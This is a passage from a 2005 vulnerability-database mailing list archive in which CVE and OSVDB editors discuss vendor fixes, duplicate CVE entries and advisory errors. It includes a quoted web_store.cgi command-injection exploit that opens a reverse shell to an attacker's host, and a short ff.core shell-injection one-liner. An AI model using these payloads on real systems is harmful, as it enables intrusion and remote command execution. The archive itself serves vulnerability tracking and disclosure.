threatended to send future discoveries to private mailing lists which is in a way a direct attack coming just hours before the hostingcon expo. version 1.597 was released within an hour of the public posting on 3AM 6/6/05 A timely report has surfaced naming nearly 6 vulnerabilities found in Lpanel. These issues were fixed within the hour of our forums being spammed with the information. Please read here for more information: http://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034413.html Please be sure to update to this version. We will continue to perform security audits on Lpanel to discover any other similar issues, if any are found we will address them in the next couple days. Confirmation is also noted by our users: Any questions please contact mike@lpanel.net Mike Lpanel.net From jericho at attrition.org Fri Jun 10 04:37:51 2005 From: jericho at attrition.org (security curmudgeon) Date: Fri Jun 10 04:37:53 2005 Subject: [VIM] Lutelwall vendor ack/fix Message-ID: Freshmeat: [038] - LutelWall 0.98 (Development) by Tomek Lutelmowski (http://freshmeat.net/users/TomekLutel/) Thu, Jun 9th 2005 06:40 Changes: Insecure temp file creation during update was fixed. Passive FTP connections were corrected. License: GNU General Public License (GPL) URL: http://freshmeat.net/projects/lutelwall/ From coley at linus.mitre.org Fri Jun 10 14:07:17 2005 From: coley at linus.mitre.org (Steven M. Christey) Date: Fri Jun 10 14:17:26 2005 Subject: [VIM] 17136: Lpanel diagnose.php Arbitrary Domain DNS Setting Reset DoS (fwd) In-Reply-To: References: Message-ID: It took a couple minutes, but a link to the online changelog is at: http://www.lpanel.net/changelog.php Thanks, Brian! - Steve From coley at linus.mitre.org Fri Jun 10 14:23:18 2005 From: coley at linus.mitre.org (Steven M. Christey) Date: Fri Jun 10 14:33:26 2005 Subject: [VIM] Lutelwall vendor ack/fix In-Reply-To: References: Message-ID: On Fri, 10 Jun 2005, security curmudgeon wrote: > Changes: Insecure temp file creation during update was fixed. Passive FTP > connections were corrected. As strong as the evidence is here - time of release relative to initial disclosure, type of vuln fixed - I've learned that sometimes the vendor is STILL fixing some other issue. I tried to get version 0.97 to compare with 0.98, but it's no longer available. However, comparing the current "lutelwall" script with the copy shown in the original Full-DIsclosure post, the author changed the code from this: echo -n " Changes since previous version:" echo `wget -C off -O $tmp-newfeat -q -t 1 -T 3 -w 3 http://firewall.lutel.pl/FEATURES-${new_ver}` cat $tmp-newfeat to this: echo -n " Changes since previous version:" rm -rf $tmp-newfeat if [ ! -e $tmp-newfeat ]; then echo `wget -C off -O $tmp-newfeat -q -t 1 -T 3 -w 3 http://firewall.lutel.pl/FEATURES-${new_ver}` cat $tmp-newfeat Well, at least the exploit window is much narrower now... - Steve From jericho at attrition.org Tue Jun 14 19:05:01 2005 From: jericho at attrition.org (security curmudgeon) Date: Tue Jun 14 19:05:04 2005 Subject: [VIM] new record on delayed patching.. Message-ID: Winner is RedHat? http://rhn.redhat.com/errata/RHSA-2005-489.html Issued on: 2005-06-13 [..] A bug was found in the way Squid handles access to the cachemgr.cgi script. It is possible for an authorised remote user to bypass access control lists with this flaw. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-1999-0710 to this issue. [..] http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0710 http://archives.neohapsis.com/archives/bugtraq/1999-q3/0194.html daniel@NEWS.GUS.NET Fri, 23 Jul 1999 16:36:32 -0700 -- So Jul 23, 1999 vuln gets patched Jun 13, 2005? From coley at linus.mitre.org Tue Jun 14 19:10:54 2005 From: coley at linus.mitre.org (Steven M. Christey) Date: Tue Jun 14 19:11:05 2005 Subject: [VIM] new record on delayed patching.. In-Reply-To: References: Message-ID: On Tue, 14 Jun 2005, security curmudgeon wrote: > Winner is RedHat? > > http://rhn.redhat.com/errata/RHSA-2005-489.html > Issued on: 2005-06-13 > > A bug was found in the way Squid handles access to the cachemgr.cgi script. It > is possible for an authorised remote user to bypass access control lists with > this flaw. The Common Vulnerabilities and Exposures project (cve.mitre.org) has > assigned the name CVE-1999-0710 to this issue. Hmmmm... but CVE-1999-0710 lists REDHAT:RHSA-1999:025 as an advisor, so it had been fixed at *some* point in the past. That means that this is either (1) a regression or (2) an improper application of an old CVE to a similar issue or variant, which sometimes happens. Either way, time for an email :) - Steve From jericho at attrition.org Tue Jun 14 19:11:45 2005 From: jericho at attrition.org (security curmudgeon) Date: Tue Jun 14 19:11:47 2005 Subject: [VIM] new record on delayed patching.. Message-ID: (sorry if this comes through twice, testing something) Winner is RedHat? http://rhn.redhat.com/errata/RHSA-2005-489.html Issued on: 2005-06-13 [..] A bug was found in the way Squid handles access to the cachemgr.cgi script. It is possible for an authorised remote user to bypass access control lists with this flaw. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-1999-0710 to this issue. [..] http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0710 http://archives.neohapsis.com/archives/bugtraq/1999-q3/0194.html daniel@NEWS.GUS.NET Fri, 23 Jul 1999 16:36:32 -0700 -- So Jul 23, 1999 vuln gets patched Jun 13, 2005? From jericho at attrition.org Tue Jun 14 19:13:01 2005 From: jericho at attrition.org (security curmudgeon) Date: Tue Jun 14 19:13:02 2005 Subject: [VIM] Re: old Solaris ff.core help =) (fwd) Message-ID: ---------- Forwarded message ---------- From: Casper.Dik@Sun.COM To: security curmudgeon Cc: Steven Christey Date: Wed, 08 Jun 2005 09:48:12 +0200 Subject: Re: old Solaris ff.core help =) >this post: > >http://archives.neohapsis.com/archives/bugtraq/1995_1/0003.html > >This is one of a few mentions of "two vulnerabilities in ff.core". Based >on the date, the Aug 30, 1994 IFS would be one of the two, but I can't >find record of the second beyond the somewhat cryptic 101889 patch notes >and several mail list posts. > >In short, can you confirm there were two vulnerabilities around 1994/1995 >in ff.core? If so, any hint as to what the second was, or the impact? >Given the age of the program, I don't think it is letting any serious >cat out of the bag =) This is purely for a historic perspective on >vulnerabilities. ff.core was a mess and there were certainly several vulnerabilities in it; I corresponded a lot about this with Sun and then made sure it was mostly fixed after I joined Sun. It used popen/system a lot and allowed you to chown tandom files. My old favourite exploit (which I had memorized and could type by hand) after the initial (botched ) fix was: mkdir -p '/tmp/rdiskette0/`/bin/sh/dev/tty 2>&1`' ff.core 0 1 '/tmp/rdiskette0/`/bin/sh/dev/tty 2>&1`' x There were some symlink issues and there was the ability to rename random files. Casper From jericho at attrition.org Tue Jun 14 20:26:41 2005 From: jericho at attrition.org (security curmudgeon) Date: Tue Jun 14 20:27:18 2005 Subject: [VIM] #2005-0028 typo Message-ID: >From the advisory: wget: - Security Fix: wget allows a remote malicious web server to overwrite certain files via a redirection URL containing a ".." that resolves to the IP address of the malicious server, which bypasses wget's filtering for ".." sequences. - wget does not filter or quote control characters when displaying HTTP responses to the terminal, which may allow remote malicious web servers to inject terminal escape sequences and execute arbitrary code. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2004-1487 and CAN-2004-1487 to these issues. This lists the same two CAN designations. From jericho at attrition.org Wed Jun 15 06:40:22 2005 From: jericho at attrition.org (security curmudgeon) Date: Wed Jun 15 06:40:24 2005 Subject: [VIM] new record on delayed patching.. In-Reply-To: References: Message-ID: : Winner is RedHat? : : http://rhn.redhat.com/errata/RHSA-2005-489.html : Issued on: 2005-06-13 http://rhn.redhat.com/errata/RHSA-2005-415.html Also covers five CVE including 1999-0710. From coley at mitre.org Thu Jun 16 18:12:40 2005 From: coley at mitre.org (Steven M. Christey) Date: Thu Jun 16 18:13:01 2005 Subject: [VIM] LaTeX2rtf vendor acknowledgement (Sep 2004) Message-ID: <200506162212.j5GMCeWr013105@linus.mitre.org> The expandmacro() buffer overflow in LaTeX2rtf 1.9.15 was addressed by the vendor. http://cvs.sourceforge.net/viewcvs.py/latex2rtf/latex2rtf/definitions.c?rev=1.22&view=log The "Sat Oct 2 18:31:00 2004" entry says "avoid buffer overruns in macro expansion that can be security holes reported by D. J. Bernstein". (CVE candidate pending. Cross-refs: BID:11233, SECTRACK:1011367, OSVDB:10216, XF:latex2rtf-expandmacro-bo(17460)) - Steve From coley at mitre.org Wed Jun 22 19:06:09 2005 From: coley at mitre.org (Steven M. Christey) Date: Wed Jun 22 19:06:54 2005 Subject: [VIM] Vendor ack inquiry for DUware issues Message-ID: <200506222306.j5MN699E026364@linus.mitre.org> I just sent an inquiry to http://www.duware.com/home/contact.asp to ask DUware about the various issues that have been released in recent months, including: http://echo.or.id/adv/adv19-theday-2005.txt http://www.digitalparadox.org/advisories/dup.txt http://www.digitalparadox.org/advisories/duppro.txt Note that there is partial overlap between the ECHO_ADV_19$2005 advisory and the digital paradox posts, although I haven't fully diagnosed it yet. - Steve From jericho at attrition.org Fri Jun 24 05:00:54 2005 From: jericho at attrition.org (security curmudgeon) Date: Fri Jun 24 05:00:56 2005 Subject: [VIM] Vendor ack inquiry for DUware issues In-Reply-To: <200506222306.j5MN699E026364@linus.mitre.org> References: <200506222306.j5MN699E026364@linus.mitre.org> Message-ID: : I just sent an inquiry to http://www.duware.com/home/contact.asp to : ask DUware about the various issues that have been released in recent : months, including: : : http://echo.or.id/adv/adv19-theday-2005.txt : http://www.digitalparadox.org/advisories/dup.txt : http://www.digitalparadox.org/advisories/duppro.txt : : Note that there is partial overlap between the ECHO_ADV_19$2005 advisory : and the digital paradox posts, although I haven't fully diagnosed it : yet. I'm just getting to these for OSVDB and my first glance through suggests there is overlap. Hopefully I will get to them tonight or this weekend and have a concise list of vulns. Why can't vendors just fix stuff faster! =) From jericho at attrition.org Fri Jun 24 18:37:57 2005 From: jericho at attrition.org (security curmudgeon) Date: Fri Jun 24 18:37:58 2005 Subject: [VIM] Reverse Engineering Microsoft Patches in 20 Minutes Message-ID: http://www.osvdb.org/blog/ Reverse Engineering Microsoft Patches in 20 Minutes Posted in General Vulnerability Info on June 24th, 2005 by jericho Halvar posted to the DailyDave mail list today showing a brief flash based demonstration of some of his reverse engineering tools. The presentation shows how one can reverse engineer a Microsoft patch using binary diff analysis, and figure out exactly what the vulnerability is, down to the function. What will this technology and method do, when hundreds (thousands?) of people can reverse engineer a patch that fast, and offer full vulnerability details within minutes of a patch? That type of information would be incredibly valuable to some people, probably for more nefarious purposes. That type of information would be incredible for the security community and vulnerability databases who often have a difficult time seperating issues due to lack of details. Even more interesting, would this show a more concise history of vulnerabilities in a given vendors product that demonstrates the same programs, routines and even functions are found vulnerable repeatedly? Would this help companies identify who should be singled out for additional secure coding workshops? post: http://archives.neohapsis.com/archives/dailydave/2005-q2/0377.html demo: http://www.sabre-security.com/products/flash_bindiff_png.html From jericho at attrition.org Sat Jun 25 07:20:29 2005 From: jericho at attrition.org (security curmudgeon) Date: Sat Jun 25 07:20:32 2005 Subject: [VIM] Slowaris? Message-ID: Hah, the old joke about Sun patching! http://sunsolve.sun.com/search/document.do?assetkey=1-26-101426-1 1. The "Safe.pm" Perl module contains a security vulnerability which may allow a local or remote unprivileged user to bypass compartment access controls if a Perl application utilizes the "Safe.pm" Perl module. 2. The "CGI.pm" Perl module contains a cross site scripting security vulnerability.. These issues are described here: CIAC Bulletin n-155 - http://www.ciac.org/ciac/bulletins/n-155.shtml CAN-2003-0615 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0615 CAN-2002-1223 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1323 From jericho at attrition.org Sun Jun 26 06:32:49 2005 From: jericho at attrition.org (security curmudgeon) Date: Sun Jun 26 06:32:51 2005 Subject: [VIM] Security Vulnerability Severity Classification Message-ID: http://www.suse.de/~thomas/papers/Severity-Metric.pdf Security Vulnerability Severity Classification by Thomas Biege (thomas[at]suse.de) 27th January 2005 Abstract This paper will describe a method of classifying the severity of security bugs in software for Unix-like systems. On the following pages I will propose a metric with weights to describe the impact of vulnerabilities on a scala S with n elements to provide an objective rating system. This classification scheme should serve as reference for the SuSE Security Team for releasing security announcements. Hopefully this mechanism will be adopted by other vendors to have a vendor independent rating system. Such a vendor independent rating scheme will help customers, other vendors, and security companies/organisations to judge more precisely about the level of impact of a released security update. From jericho at attrition.org Mon Jun 27 05:09:27 2005 From: jericho at attrition.org (security curmudgeon) Date: Mon Jun 27 05:09:30 2005 Subject: [VIM] Returned post for bugtraq@securityfocus.com (web_store.cgi) Message-ID: ---------- Forwarded message ---------- From: bugtraq-help@securityfocus.com To: jericho@attrition.org Date: 27 Jun 2005 01:12:05 -0000 Subject: Returned post for bugtraq@securityfocus.com Hi! This is the ezmlm program. I'm managing the bugtraq@securityfocus.com mailing list. I'm working for my owner, who can be reached at bugtraq-owner@securityfocus.com. I'm sorry, the list moderators for the bugtraq list have failed to act on your post. Thus, I'm returning it to you. If you feel that this is in error, please repost the message or contact a list moderator directly. --- Enclosed, please find the message you sent. From: security curmudgeon To: bugtraq@securityfocus.com Date: Wed, 22 Jun 2005 04:47:00 -0400 (EDT) Subject: Re: Remote Exploit for Web_store.cgi On Mon, 13 Jun 2005 ActionSpider@securityfocus.com wrote: : #!/usr/bin/perl -w : # : #******************************************************************************************** : # Remote Command Execution Vulnerability In Web_store.cgi * : $string="/$path/web_store.cgi?page=.html|cd /tmp;echo ".q{use Socket;$execute= 'echo "`uname -a`";echo "`id`";/bin/sh';$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname('tcp');socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET");system($execute);close(STDIN)}." >>dc.pl;perl dc.pl $ip $reverse|"; This was disclosed on 2004-07-17 by Zero_X www.lobnan.de Team (zero-x@linuxmail.org). http://archives.neohapsis.com/archives/bugtraq/2004-07/0197.html From jericho at attrition.org Mon Jun 27 20:49:25 2005 From: jericho at attrition.org (security curmudgeon) Date: Mon Jun 27 20:49:27 2005 Subject: [VIM] CVE Dupe? (2005-0756 & 2005-1762) Message-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2005-0756 ptrace 2.6.8.1 does not properly verify addresses on the amd64 platform, which allows local users to cause a denial of service (kernel crash) http://cve.mitre.org/cgi-bin/cvename.cgi?name=2005-1762 (reserved) but: http://www.ubuntulinux.org/support/documentation/usn/usn-143-1 A Denial of Service vulnerability has been discovered in the ptrace() call on the amd64 platform. By calling ptrace() with specially crafted ("non-canonical") addresses, a local attacker could cause the kernel to crash. This only affects the amd64 platform. (CAN-2005-1762) At first glance, 0756 seems to cover 'ptrace' the utility. If that is the case, almost everyone is referencing it incorrectly as "Linux Kernel ptrace() function". If it is indeed referring to the ptrace function, then these two issues seem very close. Both linux kernel, both on amd64 specifically, both DoS, both with ptrace() function, both via "address validation" issues. From coley at mitre.org Wed Jun 29 13:57:36 2005 From: coley at mitre.org (Steven M. Christey) Date: Wed Jun 29 14:00:40 2005 Subject: [VIM] Differences between ASPNuke (ASP Nuke? ASP-Nuke?) and aspnuke? Message-ID: <200506291757.j5THvacJ014111@linus.mitre.org> Notice: BUGTRAQ:20050627 aspnuke is vulnerable to sql injection URL:http://marc.theaimsgroup.com/?l=bugtraq&m=111989828622112&w=2 The poster says "remember aspnuke is [quite different] from asp-nuke." I can't figure out *how* or *why*, though. www.aspnuke.com, referenced in the Bugtraq post, isn't working. But some other posts for "ASP Nuke" earlier that week, such as this: BUGTRAQ:20050626 M4DR007-07SA (security advisory): Multiple vulnerabilities in ASP Nuke 0.80 URL:http://marc.theaimsgroup.com/?l=bugtraq&m=111989223906484&w=2 Also use "www.aspnuke.com" as the vendor. But a completely different spelling. Then there's "asp-nuke.com," which appears to be the "asp-nuke" that is referred to in the first post. Anybody know what's going on? Are there 2 "ASP Nuke" products or three? Which bug report goes with which product? - Steve From jericho at attrition.org Thu Jun 30 06:16:21 2005 From: jericho at attrition.org (security curmudgeon) Date: Thu Jun 30 06:16:23 2005 Subject: [VIM] Plans security question (fwd) Message-ID: ---------- Forwarded message ---------- From: security curmudgeon To: daltonlp@gmail.com Date: Thu, 30 Jun 2005 06:15:31 -0400 (EDT) Subject: Plans security question Hi, I saw the news entry dated Apr 30, 2005 for the SQL bug that could disclose the mySQL password. Updating to 6.7.1 fixes this. I also saw Secunia released information regarding an SQL injection attack in plans.cgi (http://secunia.com/advisories/15854/) on Jun 29, 2005. Their note says upgrading to 6.7.2 fixes this bug. I did not see mention of the plans.cgi SQL injection on your news site and was wondering if these really refer to the same vulnerability, or if this is two seperate issues? Thanks for any clarification! Brian From coley at linus.mitre.org Thu Jun 30 14:54:24 2005 From: coley at linus.mitre.org (Steven M. Christey) Date: Thu Jun 30 14:55:47 2005 Subject: [VIM] Security Vulnerability reported in ActiveBuyAndSell 6.2 (fwd) Message-ID: No response yet... This is CAN-2005-2063. - Steve ---------- Forwarded message ---------- Date: Tue, 28 Jun 2005 21:33:32 -0400 (EDT) From: Steven M. Christey To: Support@activewebsoftwares.com Cc: jschommer@mitre.org, coley@mitre.org Subject: Security Vulnerability reported in ActiveBuyAndSell 6.2 Hello, I am a computer security professional and the editor for the Common Vulnerabilities and Exposures (CVE) project. CVE is a list of software vulnerabilities, and it is widely used in the computer security industry. Recently, a vulnerability in ActiveBuyAndSell was publicly reported to a well-known security mailing list: BUGTRAQ:20050624 [ECHO_ADV_21$2005] MUltiple Vulnarable In ActiveBuyAndSell URL:http://marc.theaimsgroup.com/?l=bugtraq&m=111963341429906&w=2 Is this vulnerability report accurate? If so, then is the problem fixed, and in which versions? Thank you, Steve Christey Principal Information Security Engineer CVE Editor The MITRE Corporation From coley at linus.mitre.org Thu Jun 30 14:59:49 2005 From: coley at linus.mitre.org (Steven M. Christey) Date: Thu Jun 30 15:01:11 2005 Subject: [VIM] CVE Dupe? (2005-0756 & 2005-1762) In-Reply-To: References: Message-ID: On Mon, 27 Jun 2005, security curmudgeon wrote: > http://cve.mitre.org/cgi-bin/cvename.cgi?name=2005-0756 > http://cve.mitre.org/cgi-bin/cvename.cgi?name=2005-1762 > (reserved) > > but: > > http://www.ubuntulinux.org/support/documentation/usn/usn-143-1 Hmmmm. Both CANs were assigned by Red Hat, so the likelihood of a dupe may be low. I'll check it out. - Steve From jericho at attrition.org Thu Jun 30 17:18:04 2005 From: jericho at attrition.org (security curmudgeon) Date: Thu Jun 30 17:18:06 2005 Subject: [VIM] Re: Plans security question (fwd) Message-ID: ---------- Forwarded message ---------- From: Lloyd Dalton To: security curmudgeon Date: Thu, 30 Jun 2005 11:21:16 -0500 Subject: Re: Plans security question Brian, Thanks for the note. I actually wasn't aware of the note on securia. I suspect it was NoseyNick who posted it (he discovered the holes). The sql injection / xss vulnerability you mention was actually fixed in 6.7.1 (not in 6.7.2). The version on securia is incorrect. It is a separate issue from the password exposure issue. It also wasn't described very well on the main page (it should say "Fixes for several potential sql injection and cross-site scripting vulnerabilities") Hope this helps, - Lloyd Dalton On 6/30/05, security curmudgeon wrote: > > Hi, > > I saw the news entry dated Apr 30, 2005 for the SQL bug that could > disclose the mySQL password. Updating to 6.7.1 fixes this. > > I also saw Secunia released information regarding an SQL injection attack > in plans.cgi (http://secunia.com/advisories/15854/) on Jun 29, 2005. Their > note says upgrading to 6.7.2 fixes this bug. > > I did not see mention of the plans.cgi SQL injection on your news site and > was wondering if these really refer to the same vulnerability, or if this > is two seperate issues? > > Thanks for any clarification! > > Brian > >